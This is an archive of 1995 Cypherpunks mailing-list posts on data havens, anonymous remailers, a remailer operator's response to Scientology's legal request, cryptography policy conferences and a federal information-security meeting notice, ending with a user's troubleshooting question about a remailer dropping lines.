erinet.com (Paul J. Ste. Marie) Date: Sat, 14 Jan 95 22:02:48 PST Subject: How do I know if its encrypted? Message-ID: <9501150554.AB29412@eri.erinet.com> At 10:51 AM 1/14/95 -0700, Ben.Goren at asu.edu wrote: > ... Dave certainly doesn't want to know what Alice is sending him, because he >might have to answer to a Grand Jury if he did. ... > >Of course, any data haven worth paying for will offer lots of neat >features, like PGP support, anonymous file drops, and all other sorts of >goodies. But that does little good if Alice can trick Dave into selling >child pornography. ... At 11:45 PM 1/14/95, Robert Rothenberg wrote: > ... How does one keep a site from becomming a remote pirated-software exchange >site? (Esp. since after that MIT case laws may be changed...) It seems that >such a service could become a magnet for the "elite warez" crowd... and even >if the operator isn't jailed it could lead to a shutdown of the service. The whole point of a "data haven" is that the site of operation is in a jurisdiction where these things are not legal problems. If you operate a DH in a location where child pornography/copyright laws are vigorously enforced, I really doubt that encryption is going to make any difference. As Robert rightly points out, a DH probably will become a location of massive copyright violation, etc ad nauseum. I've cc'ed Mike Godwin on this in the hope that he can shed some light on what the scienter requirements for something like this would be. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From j.hastings6 at genie.geis.com Sun Jan 15 00:26:31 1995 From: j.hastings6 at genie.geis.com (j.hastings6 at genie.geis.com) Date: Sun, 15 Jan 95 00:26:31 PST Subject: L.A. area-Karl Hess Club Message-ID: <199501150826.AA027478379@relay2.geis.com> The following was written by me, Kent Hastings: Sorry, no PGP sig, I'm stranded in Chico,CA for a while... L O S A N G E L E S A R E A M E E T I N G "Extremism in the defense of liberty is no vice, and let me remind you, moderation in the pursuit of justice is no virtue." - Aristotle, as used by Karl Hess for Barry Goldwater. --- T h e K a r l H e s s C l u b --- "GOODBYE, MURRAY!" In the third meeting in the Post Election Series, we intended to present an update on the Objectivists after our meetings with the Republicans, the Libertarian Party, and Left Anarchists. Unfortunately, the Ayn Rand Institute declined our invitation to address our group on The Night Of January The 16th. When readers of Liberty Magazine were asked to rate the influence of various thinkers, at the top, with an equal rating to Rand, was "Mr. Libertarian," Murray N. Rothbard, PhD. Murray died last week, so we will instead have a special Memorial tribute to his life and thought. He is best known for his work in Austrian School economics and Libertarian philosophy, and notorious for bashing Objectivists with essays like "The Sociology of the Ayn Rand Cult." (Don't worry, the abuse was mutual). His most recent libertarian strategy was to make an alliance with the Old Right, a.k.a. "Paleoconservatives." We hope you'll agree that this is relevant in our Post Election environment. Samuel Edward Konkin III (SEK3) knew Murray personally, and credits him as a founder of the modern Libertarian movement in written accounts in his magazine, New Libertarian. I assume SEK3 will host tributes from others who also knew Murray. Monday, January 16, 1995 Hasmik's Family Restaurant Cheviot Hills neighborhood of Los Angeles National Blvd (I think 9824 National) Unfortunately, I can't attend this one because of the floods, and I don't have the address handy, but it is the same time and place as the last meeting. Kent - j.hastings6 at genie.geis.com From lce at wwa.com Sun Jan 15 01:09:10 1995 From: lce at wwa.com (Larry E) Date: Sun, 15 Jan 95 01:09:10 PST Subject: How do I know if its encrypted? In-Reply-To: <9501150554.AA29412@eri.erinet.com> Message-ID: In article <9501150554.AA29412 at eri.erinet.com>, pstemari at erinet.com (Paul J. Ste. Marie) wrote: > > 1) Defeating traffic analysis of point-to-point communications. > Mandating encryption for this is redundant--anyone who wanted this > would be encrypting their mail to begin with. Also, I don't > believe this mode of operation generates many complaints. Agreed. > > 2) Anonymous broadcast transmission. This one can generate a lot of > complaints, but it is also very important for things like *.recovery > newsgroups. Mandating encryption renders this mode useless. > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Here, I don't understand your point. If you mean an encrypted message to a remailer cannot result in a plaintext usenet posting, that of course is not true. The remailers have PGP keys of their own, just as any private user may. In addition, some of the remailers support direct usenet posting. Thus, a message may be encrypted to the remailer and posted as plaintext as the remailer decrypts the message. > There is a third use, which is anonymous point-to-point transmission. While > this is of some benefit for anonymous tip line, it makes things like > mailbombs and hate mail very easy. > Agreed. At least some remailers accept requests from users that they not receive anonymous mail. The process of "kill-filing" outbound anonymous mail targeted for specific locations could of course be automated. From lcottrell at popmail.ucsd.edu Sun Jan 15 12:41:36 1995 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Sun, 15 Jan 95 12:41:36 PST Subject: Scientology Message-ID: -----BEGIN PGP SIGNED MESSAGE----- 1/15/95 TO: THOMAS M. SMALL COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE PUBLICATIONS, INC. FROM: Lance Cottrell Operator of remailer at nately and mixmaster at nately In response to your email of January 3, 1995 requesting that I block anonymous posting to the Internet news groups alt.clearing.technology and alt.religion.scientology. Although my remailers have always supported direct posting to news groups, this feature has never been advertised or supported. Since direct posting from my remailers is never used, I am willing to comply with your request. Posting to alt.clearing.technology and alt.religion.scientology has been blocked. By this action I do not admit to any wrongdoing on my part, nor do I wish to imply any wrongdoing on the part of any users of my remailers. I am merely turning of a feature that I never intended to be used. By design it is not possible to prevent users from using my remailers to send a message to another computer to be posted. I can not, and will not, block mail to other remailers or to mail-to-news gateways. Yours, Lance M. Cottrell CC: Cypherpunks at toad.com, remailer-operators at c2.org, alt.privacy.anon-server, alt.privacy, alt.religion.scientology, alt.clearing.technology -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLxl9WlVkk3dax7hlAQH5lAP9HWND3nMsoz/Yn6fz36iqtDqI7s3cEllM Gaajeq4qAR/t5a5CrEyOW1sYq+bxw5UZppREJC5uBbcp7ZP2k/7jprEcq9O7run3 ZX985aIY8f5kI6GmUemhmQcflgyNDoeDJMFhRBrvDQqCWueLKVUZLNXx9bsMCi94 EH/mStSfdJY= =UgN1 -----END PGP SIGNATURE----- From adam at bwh.harvard.edu Sun Jan 15 12:42:01 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Sun, 15 Jan 95 12:42:01 PST Subject: 2 announcements of possible interest Message-ID: <199501152041.PAA10484@bwh.harvard.edu> 2 announcements (one from PRIVACY, the other from Cyberia.) second is NII Security Issues Forum to Hold 2 Meetings 01/27/95 NEW 01/12/95 Date: Fri, 13 Jan 95 11:25:27 EST From: denning at cs.cosc.georgetown.edu (Dorothy Denning) Subject: INTERNATIONAL CRYPTOGRAPHY INSTITUTE 1995 Call for Participation (Deadline: March 15, 1995) INTERNATIONAL CRYPTOGRAPHY INSTITUTE 1995: GLOBAL CHALLENGES September 21-22, 1995 Washington, DC Presented by The National Intellectual Property Law Institute The International Cryptography Institute will focus on the cryptography challenges associated with meeting the information protection needs of users and the law enforcement and national security needs of nations. The Institute will address such topics as: - national encryption policies and regulations - meeting user needs for information security and data recovery - meeting law enforcement and national security needs - national and global encryption markets and product availability - international approaches and standards - creating an international cryptography infrastructure - the use of encryption technologies in different countries - cryptography in the financial industry and other industries - legal and policy issues of digital signatures and digital cash - new developments in encryption policies and technologies Persons interested in speaking at the conference are invited to submit a proposal to the Institute Chair: Prof. Dorothy E. Denning, Chair ICI '95 Georgetown University Computer Science Department 225 Reiss Building Washington DC 20057-0997 ph: 202-687-5703, fax: 202-687-6067 e-mail: denning at cs.georgetown.edu Proposals must be received by MARCH 15, 1995, and should include the following: - Name, title, organization, address, phone, fax, and e-mail address - Brief biography - Title of presentation - Abstract of presentation or paper - Amount of time requested for presentation and discussion Notification of acceptance will be made by April 15, 1995. Papers and materials for the proceedings will be due on August 15, 1995. Inquiries about registration or the proceedings should be addressed to: The National Intellectual Property Law Institute P.O. Box 27913, Washington, DC 20038-7913 ph: 800-301-MIND or 202-962-9494 fax: 800-304-MIND or 202-962-9495 ------------------------------ From: Seth Greenstein Subject: NII Security Issues Forum to Hold 2 Meetings 01/27/95 NEW 01/12/95 OFFICE OF MANAGEMENT AND BUDGET NOTICE OF PUBLIC MEETING Agency: Office of Management and Budget Action: National Information Infrastructure Security Issues Forum: Notice of Public Meetings and request for public comments SUMMARY: The National Information Infrastructure Security Issues Forum will conduct two public meetings to continue a dialogue between government and the private and public interest sectors on issues related to the security of information on the National Information Infrastructure (NII). Interested parties -- especially beneficiaries of Aid to Families with Dependent Children and Food Stamps, and users of public information, and participants in the sophisticated communications networks which support the U.S. transportation and customs systems -- are invited to submit a 1 - 2 page position statement and request to testify. The meetings are sponsored by the NII Security Issues Forum of the Information Infrastructure Task Force and Mega-Project III of the U.S. Advisory Council on the NII. DATES: Both public meetings, "Security of the Electronic Delivery of Government Information and Services" and "Security for Intelligent Transportation Systems and Trade Information," will be held simultaneously on Friday, January 27, 1995, from 9:00 a.m. to 12:30 p.m. in Raleigh, North Carolina. Those wishing to testify should submit a 1 - 2 page position statement and request to participate by January 20, 1995. Individuals wishing to offer general comments or present questions may request to do so during the meeting. Written comments may be submitted on paper or electronically, in ASCII format, and will be accepted until February 10, 1995. ADDRESSES: The public meeting, "Security of the Electronic Delivery of Government Information and Services," will be held in the Auditorium of the North Carolina Museum of History, 1 East Edenton Street, Raleigh, North Carolina. The public meeting, "Security for Intelligent Transportation Systems and Trade Information," will be held in the Auditorium of the Department of Cultural Affairs, 109 East Jones Street, Raleigh, North Carolina. Both buildings are in close proximity to the North Carolina Capitol Building. Position statements and requests to appear for the meeting, "Security of the Electronic Delivery of Government Information and Services," sent to the Government Information Technology Services Working Group, marked to the attention of Ms. April Ramey, U.S. Department of the Treasury, 1425 New York Avenue, Room 2150 N.W., Washington, D.C. 20220. Position statements may also be submitted via fax to (202) 622-1595 or through electronic mail to april.ramey at treas.sprint.com. Electronic mail should be submitted as unencoded, unformatted, ASCII text. Position statements and requests to appear for the meeting, "Security for Intelligent Transportation Systems and Trade Information," should be sent to the Volpe National Transportation Systems Center of the Department of Transportation, marked to the attention of Mr. Gary Ritter, DTS-21, at 55 Broadway, Cambridge, MA, 02142. Position statements may also be submitted via fax to (617) 494-2370 or through electronic mail to "Ritter at volpe1.dot.gov". Electronic mail should be submitted as unencoded, unformatted, ASCII text. Parties offering testimony are asked to provide them on paper, and where possible, in machine-readable format. Machine- readable submissions may be provided through electronic mail messages sent over the Internet, or on a 3.5" floppy disk formatted for use in an MS-DOS based computer. Machine-readable submissions should be provided as unencoded, unformatted ASCII text. Written comments should include the following information: * Name and organizational affiliation, if any, of the individual responding; * An indication of whether comments offered represent views of the respondent's organization or are the respondent's personal views; and * If applicable, information on the respondent's organization, including the type of organization (e.g., trade association, private corporation, non-profit organization) and general areas of interest. FOR FURTHER INFORMATION CONTACT: For further information relating to electronic delivery of information and services, contact Ms. April Ramey of the Treasury Department at (202) 622- 1278. For further information relating to transportation and trade issues, contact Mr. Gary Ritter at the Volpe National Transportation Systems Center by telephone at (617) 494-2716. SUPPLEMENTARY INFORMATION: I. Issues for Public Comment A. Background The public meetings are part of an ongoing dialogue with the Administration to assess the security needs and concerns of users of the National Information Infrastructure (NII). The NII is a system of high-speed telecommunications networks, databases, and advanced computer systems that will make electronic information more widely available and accessible than ever before. For example, citizens may be able to learn about federal benefits programs through public kiosks, or may receive their social security payments through direct deposit to their bank accounts. As the U.S. transportation infrastructure becomes more complex, Americans will benefit from the application of information technologies to such operations as toll collection, motor vehicle registration, and traffic routing. This increased availability and accessibility of services and products provided through information technology will dramatically affect the way in which individuals conduct their everyday affairs. Consequently, broad public and commercial use of the NII hinges upon implementing technologies, policies, and practices that not only ensure that users of information systems have access to information when and where they need it, but that subjects of information records are able to protect themselves from unauthorized or inappropriate use of information. "Americans will not use the NII to its full potential unless they trust that information will go where and when they want it and nowhere else," declared Sally Katzen, Administrator of the Office of Information Regulatory Affairs at OMB and chair of the Forum. "The Federal government is a primary user of the NII and thus a catalyst for change. Yet the NII will be designed, built, owned, operated, and used primarily by the private sector, making it essential that security on the NII be considered in partnership with the public." To address these critical issues, the Vice President formed the Information Infrastructure Task Force (IITF). The IITF is chaired by Secretary of Commerce Ron Brown and is comprised of senior Administration officials having expertise in technical, legal, and policy areas pertinent to the NII. The mission of the IITF is to articulate and implement the Administration's vision for the NII. The NII Security Issues Forum was established within the IITF to address the cross-cutting issue of security in the NII. The Forum is chaired by Sally Katzen, Administrator of the Office of Information and Regulatory Affairs in the Office of Management and Budget. In addition to the IITF, the President has established the U.S. Advisory Council on the National Information Infrastructure. The Advisory Council represents industry, labor, and public interest groups, and advises the Secretary of Commerce on issues relating to the NII. Mega-Project III, one of three work groups of the Advisory Council, is responsible for addressing security, intellectual property, and privacy issues as they relate to the NII. B. Structure and Content of Public Meeting Security is linked inextricably to broad public use of the NII. The technologies, policies, and procedures used to ensure the confidentiality, availability, and integrity of digitally produced and transmitted information, information products, and services on the NII will determine whether, how, and to what extent digitally linked information services will be broadly used in such critical applications as providing public information, supporting the delivery of government services, utilizing intelligent transportation systems, and conducting trade. Development of policies and procedures that will ensure the security of public and private information and communications on the NII requires study from different perspectives, whether that of the subject of the information, the user of the information, or the creator of the information. The Forum and Mega-Project III seek input from parties representing beneficiaries of federal information and services and users of intelligent transportation systems and trade data. Solutions to these concerns will come via technical solutions, as well as legal and policy mechanisms. The Forum and Mega-Project III seek input in this area as well. Specifically, what legal measures, policy mechanisms, and technological solutions, or combinations thereof, can be used to effectively protect the security of federal benefits information or transportation or trade data, delivered or made accessible on the NII? A panel of witnesses drawn from the public will be assembled to discuss the following topics with a panel of senior Administration officials, members of the Security Issues Forum, members of the Advisory Council, and policy makers at the State level, and to field questions and comments from other members of the public. Position statements for the meeting, "Security in the Delivery of Electronic Information and Services," should address four principal questions: 1. How do you envision the NII being used to provide services and information electronically to citizens? Specifically, what types of services and information should be delivered or made available? 2. What risks and threats do you foresee in making services and information available via the NII? Such threats might include fraud, unauthorized access, breach of confidentiality or privacy, breach of integrity, and system performance. 3. What legal, policy, and ethical issues do you foresee affecting usage of the NII? Such issues may include liability, information/property rights, access, document/records management, legal admissibility/evidentiary requirements, and auditability. Do some issues, such as privacy and open access, tend to countervene each other? 4. What kinds of administrative or technical solutions should be developed or promoted to address security, legal, and ethical concerns? Such solutions may include verifying recipient and/or vendor eligibility, ensuring operational and systems security, and establishing means to facilitate settlement, detection, and prosecution. Position statements for the meeting, "Security for Intelligent Transportation Systems and Trade Information," should address five principal questions: 1. Who should be permitted access to sensitive trade and transportation information systems? How can inappropriate access and use be prevented? 2. What technical and institutional safeguards in electronic data transmission, storage, and retrieval are needed to protect the security of trade and transportation data? Such risks might include: disclosure of proprietary and confidential business information, criminal access to trade and cargo records, disclosure of individual travel patterns or vehicle locations, or disclosure of transportation dispatch communications regarding sensitive cargo shipment routes, itineraries, and locations. 3. What does an "appropriate level of security" consist of? Is there a "one-size-fits-all" solution, or can policies be established which flexibly meet diverse needs? 4. Do certain systems merit greater degrees of security protection, such as traffic signal control systems, variable message signs, fleet location monitoring, electronic toll collection, international trade data, and motor vehicle registration records? 5. Who should establish and enforce security policies? How can government and the private sector work together to support a secure National Information Infrastructure? II. Guidelines for Participation in the Public Hearing Individuals who would like to participate on a panel must request an opportunity to do so no later than January 20, 1995, by submitting a brief, 1 - 2 page summary position statement. If approved, each participant will be allowed to present brief opening remarks. Primary participation, however, shall be during the general discussion to follow, according to the format described above. Participants in the public meeting will testify before and participate in discussions with a panel consisting of members of the Advisory Council, members of the Security Issues Forum, and other Administration officials. Individuals not selected as panel participants may offer comments or ask questions of the witnesses by requesting an opportunity to do so and being recognized during the meeting by the chairs of the meetings. Oral remarks offered in this fashion should not exceed three minutes. No advance approval is required to attend the public meetings, offer comments, or present questions. The public meeting on "Security of the Electronic Delivery of Information and Services" will be chaired by Mr. Jim Flyzik, Chair of the Government Information Technology Services Working Group of the IITF. The public meeting on "Security for Intelligent Transportation Systems and Trade Information," will be co-chaired by Ms. Ana Sol Gutierrez, Deputy Administrator of the Research and Special Programs Administration of the U.S. Department of Transportation, and Ms. Christine Johnson, Director of the Intelligent Transportation Systems Joint Program Office of the U.S. Department of Transportation. More information about the Clinton Administration's National Information Infrastructure initiative can be obtained from the IITF Secretariat. Inquiries may be directed to Yvette Barrett at (202) 482-1835, by e-mail to ybarrett at ntia.doc.gov, or by mail to U.S. Department of Commerce, IITF Secretariat, NTIA, Room 4892, Washington, D.C., 20230. For inquiries over the Internet to the IITF Gopher Server, gopher, telnet (login = gopher), or anonymous ftp to iitf.doc.gov. Access is also available over the World-Wide-Web. Questions may be addressed to nii at ntia.doc.gov. For access by modem, dial (202) 501-1920 and set modem communication parameters at no parity, 8 data bits, and one stop (N,8,1). Modem speeds of up to 14,400 baud are supported. Sally Katzen Administrator, Office of Information and Regulatory Affairs Certified to be a true copy of the original by John B. Arthur, Associate Director for Administration From entropy at IntNet.net Sun Jan 15 12:45:33 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Sun, 15 Jan 95 12:45:33 PST Subject: Dangerous Web Site In-Reply-To: Message-ID: > They do credit checks of any person, SS# ID's, national database > searches, etc of any person or business (for a small fee). I actually found it at the "Internet Credit Bureau": http://www.satelnet.org/credit/ .. their e-mail address is icb at satelnet.org. It strikes me that their service makes it incredibly easy to breach the Fair Credit Reporting Act.. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From eric at remailer.net Sun Jan 15 12:46:09 1995 From: eric at remailer.net (Eric Hughes) Date: Sun, 15 Jan 95 12:46:09 PST Subject: voice pgp In-Reply-To: <950114234444_73211.3713_DHI35-1@CompuServe.COM> Message-ID: <199501151705.JAA00195@largo.remailer.net> From: Loren Fleckenstein <73211.3713 at compuserve.com> I've heard mention that Phil Zimmermann was going to demonstrate Voice PGP at the January Cypherpunks meeting at Cygnus. 1. We've been meeting at SGI for several months now. 2. Phil Z. was there; there was no demo. Draw your own conclusions. Eric From entropy at IntNet.net Sun Jan 15 12:46:22 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Sun, 15 Jan 95 12:46:22 PST Subject: Crypto functions In-Reply-To: <9501102208.AA26444@snark.imsi.com> Message-ID: > I wouldn't use BLOWFISH. Why? > MD4 is flawed -- and its a hash function, not a crypto function (as is > MD5). I'm curious - do you view one-way hash functions as nonessential for crypto? -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From entropy at IntNet.net Sun Jan 15 12:46:32 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Sun, 15 Jan 95 12:46:32 PST Subject: Data Haven problems In-Reply-To: <9501090448.AA14477@anchor.ho.att.com> Message-ID: > Some sites may only accept encrypted files, which reduces the spam > potential considerably, as well as reducing your exposure to the > porn police, though it's difficult to do anything about files that are > encrypted with a public key whose private key has been posted to the net, > or fake crypto headers in an otherwise unencrypted file, This is interesting; during the last week or so that I've not been current with the list, I've started to implement a data-haven that takes information over sockets or MIME e-mail, and requires the use of PGP keypairs for the data. I don't *WANT* to know what data they're transferring me. If digicash would ever reply to one of my applications, I could sell it on a digicash/day basis. Blah. Neat idea, but the $ part is kinda limiting. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From asgaard at sos.sll.se Sun Jan 15 12:47:17 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Sun, 15 Jan 95 12:47:17 PST Subject: Another problem w/Data Havens... In-Reply-To: <9501150445.AA13977@toad.com> Message-ID: Robert Rothenberg wrote: > such a service could become a magnet for the "elite warez" crowd... What's wrong with young, curious eLiTiStS running storing sites for mutual benefits ('warez')? Some say copyright is dead. Others have taken this to their hearts, especially for private use, and I don't blame them. Copyrighted data on a server in a jurisdiction that doesn't acknowledege the copyrights - a prime use for Data Havens when they come of age. Mats From jsled at free.org Sun Jan 15 12:48:04 1995 From: jsled at free.org (Josh Michael Sled) Date: Sun, 15 Jan 95 12:48:04 PST Subject: C`punks slogan? - Pri Message-ID: <199501151237.MAA02068@squeaky.free.org> -----BEGIN PGP SIGNED MESSAGE----- lmccarth at thor.cs.umass.ed wrote: > Lest we suffer a recurrence of the C'punks Logo thread, which generated a > whole raft of list traffic which would have been better kept private, please > reply directly to Joshua and not to the whole list. [He seems to imply that > he wants private replies ("testing procmail") anyway, but I want to encourage > this practice explicitly.] Thanks... actually, that's exactly what I wanted, but forgot to put it in... and my last post about "Slogan help": disregard that entirely... it's not needed (either part). But so far I've only gotten one reply about the slogan thing, so please give me help on that one, folks... Josh Sled -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLxf3kKTT29daLBKRAQGEWgQAhrKR/r/+mqXO63RN86c7hq3bsmid2KLU ct2zJAebaZBzVvltrF3WsBYoWmCSo1tWrYFjv3QsU1gnRJRyxSGVtzzkfOSq7b51 UlGRzUb+6AXvviWmqdBwHGWbT4M6/mxxH8X8gC/eeFWyHMpgEcFzhV9tWUHCqkC/ GMDvXoaKPa0= =i71M -----END PGP SIGNATURE----- --- � KWQ/2 1.2g NR � "MTV get off the air!" - DKs From Ben.Goren at asu.edu Sun Jan 15 14:01:27 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Sun, 15 Jan 95 14:01:27 PST Subject: Another problem w/Data Havens... Message-ID: At 9:45 PM 1/14/95, Robert Rothenberg wrote: >[. . .] >How does one keep a site from becomming a remote pirated-software exchange >site? [. . . .] Simple. The file is deleted upon retrevial. b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059. From ianf at sydney.sgi.com Sun Jan 15 15:56:47 1995 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Sun, 15 Jan 95 15:56:47 PST Subject: Draft of editorial to SF Chronicle In-Reply-To: <199501140623.WAA14448@netcom4.netcom.com> Message-ID: <9501161049.ZM27032@wiley.sydney.sgi.com> On Jan 13, 10:23pm, Raph Levien wrote: > Negative response was immediate. The perpetrators were asked to stop, > but they refused to. One Norwegian hacker took it upon himself to > track down and "cancel" the offending messages. Most people on the Net > considered this to be entirely appropriate. It would probably be more accurate to say that there was little condemnation of this action, and quite a groundswell of support for the move. > A number of other self-promoting hucksters have sensed an opportunity, > and have performed similar spams. In response, the Net evolved a > defense mechanism to counter these spams and minimize the damage. The > person currently serving this role is known by the pseudonym > "CancelMoose." Almost everyone on the Net supports this effort, and > agrees that it improves the overall value of Usenet. Ditto. > In many countries (and even China is on the Net these days), writings > critical of the government, such as exposure of human rights abuses, > are illegal. The authors face imprisonment, torture and death. By > posting anonymously to the Net, the information can be brought safely > to the attention of the world. Perhaps mention the Russian coup, where the net became a conduite for information leaving Moscow. I remember a colleague of mine announcing incidents which had occured within Moscow hours before the news services broadcast them, simply by getting emails from a colleague nearby, Ian. From rishab at dxm.ernet.in Sun Jan 15 16:38:24 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sun, 15 Jan 95 16:38:24 PST Subject: Jude Milhon in WIRED Message-ID: WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter member of the cypherpunks - a term that she coined." I didn't even know there _was_ a charter. The interview as such is mainly about why "girls _need_ modems." ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From root at einstein.ssz.com Sun Jan 15 16:50:09 1995 From: root at einstein.ssz.com (root) Date: Sun, 15 Jan 95 16:50:09 PST Subject: Draft of editorial to SF Chronicle In-Reply-To: <9501161049.ZM27032@wiley.sydney.sgi.com> Message-ID: <199501160027.SAA00332@einstein.ssz.com> > > Ditto. > > > In many countries (and even China is on the Net these days), writings > > critical of the government, such as exposure of human rights abuses, > > are illegal. The authors face imprisonment, torture and death. By > > posting anonymously to the Net, the information can be brought safely > > to the attention of the world. > > Perhaps mention the Russian coup, where the net became a conduite for > information leaving Moscow. I remember a colleague of mine announcing > incidents which had occured within Moscow hours before the news services > broadcast them, simply by getting emails from a colleague nearby, > > It was even possible to get eyewitness descriptions of much of the troop movement in Moscow in near real-time on #russia. The attack on the Russian White House was in particular quite interesting to watch on CNN and compare what was going on via irc comments. From ianf at sydney.sgi.com Sun Jan 15 16:56:51 1995 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Sun, 15 Jan 95 16:56:51 PST Subject: Crypto functions In-Reply-To: Message-ID: <9501161145.ZM27648@wiley.sydney.sgi.com> On Jan 15, 10:35am, Jonathan Cooper wrote: > > I wouldn't use BLOWFISH. > Why? Well, I wasn't the original person who said that they wouldn't use it, but I would agree. It's too new. It looks very good so far, but until it's been through a lot more analysis than Blowfish has received so far, it is too much of an unknown quantity. Ian. From aj at pcnet.com Sun Jan 15 17:00:00 1995 From: aj at pcnet.com (A.J. Janschewitz) Date: Sun, 15 Jan 95 17:00:00 PST Subject: Jude Milhon in WIRED In-Reply-To: Message-ID: On Sun, 15 Jan 1995 rishab at dxm.ernet.in wrote: > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter > member of the cypherpunks - a term that she coined." I didn't even know there > _was_ a charter. The interview as such is mainly about why "girls _need_ > modems." WiReD. What a waste of pulp; worse, what a waste of potential. A magazine that could have held the hands of aol novices and led them into the real net.world, and promoted freenets, and demonstrated the need for cryptosystems, and challenged the minds of net citizens decided to take the low road and become "USA Today" (for cypherpunks abroad, "USA-T" is a `newspaper' that looks like a big comic book, and doesn't trouble its readers with many syllables ... rather like Prodigy ...). ==a.j.== -- "The large print giveth and the small print taketh away." - Tom Waits From perry at imsi.com Sun Jan 15 17:19:37 1995 From: perry at imsi.com (Perry E. Metzger) Date: Sun, 15 Jan 95 17:19:37 PST Subject: Jude Milhon in WIRED In-Reply-To: Message-ID: <9501160118.AA05350@snark.imsi.com> rishab at dxm.ernet.in says: > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter > member of the cypherpunks - a term that she coined." I didn't even know there > _was_ a charter. Or a Jude Milhon, for that matter. Another example of the continuing decay of a once proud magazine... Perry From pstemari at erinet.com Sun Jan 15 17:45:38 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Sun, 15 Jan 95 17:45:38 PST Subject: How do I know if its encrypted? Message-ID: <9501160137.AA17721@eri.erinet.com> >> newsgroups. Mandating encryption renders this mode useless. >> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > At 02:42 AM 1/15/95 -0600, Larry E wrote: >Here, I don't understand your point. If you mean an encrypted >message to a remailer cannot result in a plaintext usenet posting, >that of course is not true. The remailers have PGP keys of their >own, just as any private user may. In addition, some of the >remailers support direct usenet posting. Thus, a message may be >encrypted to the remailer and posted as plaintext as the remailer >decrypts the message. I wasn't referring to requiring encryption using the remailer's public key. I was referring to the stuff discussed here, where the remailer operator insists on ensuring that the traffic is encrypted over and beyond the remailer's public key, in order to give the operator plausable deniability. Really, all inbound remailer traffic should be encrypted with the remailer's public key if any significant level of security is desired. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From jml at wizard.synapse.net Sun Jan 15 18:03:44 1995 From: jml at wizard.synapse.net (jml at wizard.synapse.net) Date: Sun, 15 Jan 95 18:03:44 PST Subject: interesting problem with remailers Message-ID: <199501160203.VAA07586@sentinel.synapse.net> I need a good dependable cypherpunk style anomymous remailer. So I have been experimenting with a few. I have discovered a rather curious problem. I have sent test messages to homer at rahul.net. These test messages read as follows: :: Request-Remailing-To: myname at mydonain Subject: Test this is line1 this is line2 this is line3 this is line4 this is line5 this is line6 I have encrypted this message with the public key of homer at rahul.net using the pgp -ea command (for armour). This yields something like: -----BEGIN PGP MESSAGE---- version 2.6.2 blahblahblah blah blah blah blah etc..... ------END PGP MESSAGE--- I have then put :: Encrypted: PGP at the beginning of the message and send it with Eudora PC 1.4. Now curiously enough the message that I received back from homer at rahul is the following: ************************************************************* To: myname at mysite From: nobody at rahul.net Subject: Test Remailed-By: A Free Zone Remailer V1.2 Complaints-To: Homer Wilson Smith X-Comments: X-Comments: finger homer at rahul.net for instructions. X-Comments: X-Comments: Unauthorized or illegal use of this remailer, especially X-Comments: for spamming the internet or posting copyright violations X-Comments: will be prosecuted to the fullest extent of the law. X-Comments: Homer Wilson Smith (607) 277-0959, Fax: (607) 277-8913 X-Comments: FULL HEADER LOGGING IS: ON This is line1 this is line3 this is line5 ************************************************************* No this is line2 no this is line4 no this is line6 I am unable to explain this. Obviously the message must be recieved intact by the remailer because being encrypted with PGP if it were corrupt in anyway it would simply not decode properly and I would get no reply whatsoever. Now before somebody says that the trouble is at my site, I also have an account on CI$ (compuserve). The same thing happens to message I received there. So obviously it cannot be my site. Unless I am doing something that somehow tells the remailer to only remail one line out of two. (?????) And this problem is not only with homer at rahul. Other remailers do the same. I know that it most be something that I am doing but it escapes me what. Again it must receive the PGP message correctly. I am stumped.... If anybody can help explain this little mystery, it would be most appreciated. Please reply here at cypherpunks at toad.com and also forward to wizard at alpha.c2.org (to see if it works) Thanks all -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR tAZ3aXphcmQ= 